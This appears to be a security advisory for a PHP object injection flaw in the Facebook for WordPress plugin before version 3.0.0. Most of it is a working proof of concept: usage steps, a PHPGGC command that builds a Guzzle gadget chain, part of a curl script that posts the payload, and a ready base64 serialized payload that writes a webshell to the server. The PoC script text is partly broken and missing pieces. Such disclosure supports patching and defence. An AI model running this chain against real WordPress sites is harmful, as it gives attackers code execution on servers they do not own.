Facebook for WordPress < 3.0.0 - PHP Object Injection with POP Chain

The run_action function of the plugin deserializes user supplied data making it possible for PHP objects to be supplied creating an Object Injection vulnerability. There was also a useable magic method in the plugin that could be used to achieve remote code execution.

PoC

Step 1: Use the nonce generation script to generate a valid nonce. Step 2: Run the POC script like: php poc.php site.com nonce base64payload Step 3: Navigate to the shell http://mysite.com/webshell.php Nonce Generation Script ----- PoC Script ‘wp_async_send_server_events’, ‘_nonce’ => $nonce, ‘num_events’ => ‘1’, ‘event_data’ => $payload ] ); $output = curl_exec($ch); curl_close($ch); print_r($output); ?> Generate a working payload with PHPGGC, or other custom script - make sure data is base64encoded on output so null characters don’t get lost. ./phpggc Guzzle/FW1 /var/www/html/webshell.php ~/path/to/shell.php -b Sometimes the payload is finicky so you may need to take the payload into Burp Decoder to decode and modify your payload while keeping the null characters. The following payload should work on most standard instances: TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphciI6NDp7czo0MToiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAZmlsZW5hbWUiO3M6MjY6Ii92YXIvd3d3L2h0bWwvd2Vic2hlbGwucGhwIjtzOjUyOiIAR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphcgBzdG9yZVNlc3Npb25Db29raWVzIjtiOjE7czozNjoiAEd1enpsZUh0dHBcQ29va2llXENvb2tpZUphcgBjb29raWVzIjthOjE6e2k6MDtPOjI3OiJHdXp6bGVIdHRwXENvb2tpZVxTZXRDb29raWUiOjE6e3M6MzM6IgBHdXp6bGVIdHRwXENvb2tpZVxTZXRDb29raWUAZGF0YSI7YTo1OntzOjQ6Ik5hbWUiO3M6NDoidGVzdCI7czo1OiJWYWx1ZSI7czoxODoiPD9waHAgcGhwaW5mbygpOz8+IjtzOjc6IkRpc2NhcmQiO2I6MDtzOjc6IkV4cGlyZXMiO2k6MTt9fX1zOjM5OiIAR3V6emxlSHR0cFxDb29raWVcQ29va2llSmFyAHN0cmljdE1vZGUiO047fQ==